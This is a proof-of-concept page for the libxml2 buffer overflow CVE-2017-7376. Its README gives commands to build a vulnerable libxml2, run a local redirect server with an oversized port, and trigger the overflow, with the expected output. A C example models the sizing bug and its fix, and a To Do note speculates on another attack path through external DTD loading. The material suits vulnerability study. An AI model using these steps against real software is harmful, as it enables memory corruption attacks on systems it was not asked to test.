CVE-2017-7376 PoC — libxml2 buffer error vulnerability

Source
Associated Vulnerability
Title: libxml2 buffer error vulnerability (CVE-2017-7376)
Description: libxml2 is a C library developed by the GNOME project for parsing XML documents; it supports multiple encodings, XPath evaluation, and well-formedness and validity checking. libxml2 contains a buffer error vulnerability. A remote attacker can exploit it to execute arbitrary code.
Description
An example exploit for CVE-2017-7376
Readme
# libxml2-exploit
An example exploit for CVE-2017-7376

# Install
Download this repo and a vulnerable version of libxml2, e.g. v2.7.7:
```
git clone https://github.com/brahmstaedt/libxml2-exploit.git
cd libxml2-exploit
wget https://github.com/GNOME/libxml2/archive/v2.7.7.zip
unzip v2.7.7.zip
mv libxml2-2.7.7/ libxml2
```

# Setup

```
cd libxml2
```

## prepare libxml2

To make a successful exploit more visible, patch libxml2 so that it reports the buffer
overflow when it happens. This step is optional if you have other means of observing it, such
as the application crashing.

```
git apply ../nanohttp.patch
```

## build libxml2

```
./autogen.sh --prefix=$(pwd)/ --without-python
make
make install
```

If the build stops with the following error:
```
aclocal: warning: autoconf input should be named 'configure.ac', not 'configure.in'
```

comment out `AM_C_PROTOTYPES` in configure.in by replacing it with `dnl AM_C_PROTOTYPES`, e.g. like this:
```
sed 's:AM_C_PROTOTYPES:dnl AM_C_PROTOTYPES:' configure.in -i
```

Go back to the repository root:
```
cd ..
```

## prepare web server
This exploit requires a web server that answers with a redirect to a new URL whose port number
has more than 5 digits but is still below INT_MAX (2147483647 = 2^31 - 1), so that it parses as a
valid positive `int` yet needs more characters than the 5-digit port the redirect code reserves space for.

Start the server (requires Node.js and port 127.0.0.1:8080 to be unused):
```
node http.js &
```

Test the web server; wget should follow the redirect and complain about the invalid port number 2147426192:
```
wget localhost:8080
```

# Compile

```
make
```

# Run
```
./run.sh
```

Expected output:
```
Buffer overflow is detected
I/O warning : failed to load HTTP resource
buffer_overflow.xml:4: element include: XInclude error : could not load http://localhost:8080/dummy.xml, and no fallback was found
Failed to process include buffer_overflow.xml
```
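The README's port requirement (more than 5 digits, below INT_MAX) follows from a sizing mistake: the redirect code budgets room for a port written as `:xxxxx`, while the port is a C `int` that can take up to 10 decimal digits. The following added example models that mistake next to a correctly sized version; it is illustration code, not code from the libxml2-exploit repository or from libxml2's nanohttp.c, and the hostname, path, reservation constants and function names are assumptions chosen for the demonstration.

```c
/*
 * Added example (not from the libxml2-exploit repo or from libxml2 itself).
 * Models the sizing bug behind CVE-2017-7376: the buffer for the redirected
 * request line reserves room for a 5-digit port (':xxxxx'), but an int port
 * may need 10 digits.  Constants, host and path below are assumptions.
 */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed reservation of the vulnerable sizing: ':' + 5 digits. */
#define PORT_RESERVED_VULN 6
/* Correct reservation: ':' + 10 digits (INT_MAX is 2147483647). */
#define PORT_RESERVED_FIXED 11

/* Bytes needed for "GET http://<host>:<port><path>", excluding the NUL. */
static size_t request_len(const char *host, int port, const char *path) {
    int n = snprintf(NULL, 0, "GET http://%s:%d%s", host, port, path);
    return n < 0 ? 0 : (size_t)n;
}

/* Buffer size the vulnerable sizing would allocate (NUL included). */
static size_t alloc_vuln(const char *host, const char *path) {
    return strlen("GET http://") + strlen(host) + strlen(path)
           + PORT_RESERVED_VULN + 1;
}

/* Buffer size that covers any non-negative int port (NUL included). */
static size_t alloc_fixed(const char *host, const char *path) {
    return strlen("GET http://") + strlen(host) + strlen(path)
           + PORT_RESERVED_FIXED + 1;
}

/* 1 if formatting the request line would overrun a buffer of `cap` bytes. */
static int overruns(const char *host, int port, const char *path, size_t cap) {
    return request_len(host, port, path) + 1 > cap;
}

/* Hardened variant: size from the worst case and let snprintf bound the
 * write.  Returns a heap string the caller frees, or NULL on failure. */
static char *build_request(const char *host, int port, const char *path) {
    size_t cap = alloc_fixed(host, path);
    char *buf = malloc(cap);
    if (buf == NULL)
        return NULL;
    int n = snprintf(buf, cap, "GET http://%s:%d%s", host, port, path);
    if (n < 0 || (size_t)n >= cap) {   /* truncated: refuse rather than trust */
        free(buf);
        return NULL;
    }
    return buf;
}

/* Convenience check used by the test harness: does the hardened builder
 * produce exactly `expected`? */
static int request_matches(const char *host, int port, const char *path,
                           const char *expected) {
    char *r = build_request(host, port, path);
    int ok = (r != NULL) && strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int main(void) {
    const char *host = "localhost";    /* constructed */
    const char *path = "/dummy.xml";   /* constructed */
    /* 2147426192 is the port the README's redirect server hands out. */
    int ports[] = { 8080, 65535, 2147426192, INT_MAX };
    for (size_t i = 0; i < sizeof ports / sizeof ports[0]; i++) {
        size_t need = request_len(host, ports[i], path) + 1;
        size_t v = alloc_vuln(host, path), f = alloc_fixed(host, path);
        printf("port %d: need %zu, vuln alloc %zu (%s), fixed alloc %zu (%s)\n",
               ports[i], need,
               v, overruns(host, ports[i], path, v) ? "OVERRUN" : "ok",
               f, overruns(host, ports[i], path, f) ? "OVERRUN" : "ok");
    }
    char *req = build_request(host, 2147426192, path);
    if (req != NULL) {
        puts(req);
        free(req);
    }
    return 0;
}
```

With the constructed host and path, a 4- or 5-digit port fits the vulnerable allocation, while the README's 10-digit port 2147426192 needs five bytes more than it provides; the worst-case sizing covers every port up to INT_MAX. The real fix in libxml2 is a change to the reservation in nanohttp.c; the model here only reproduces the arithmetic, not the library's code.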

# To Do
This demo exploit requires the host program to call `xmlXIncludeProcess()` to reach the faulty code in
libxml2, which few real applications are likely to do. However, nanohttp.c describes itself in a comment
as a `minimalist HTTP GET implementation to fetch external subsets`, which suggests that loading an external
DTD subset over HTTP may offer another path to the same code.
File Snapshot

```
/data/pocs/50fd7cf8050b1f0bf2a37bcd2f68d0f64a6aaaf6
├── buffer_overflow.xml  (254 B)
├── http.js              (165 B)
├── LICENSE              (1.0K)
├── main.c               (989 B)
├── Makefile             (102 B)
├── nanohttp.patch       (396 B)
├── README.md            (2.0K)
└── run.sh               (79 B)

0 directories, 8 files
```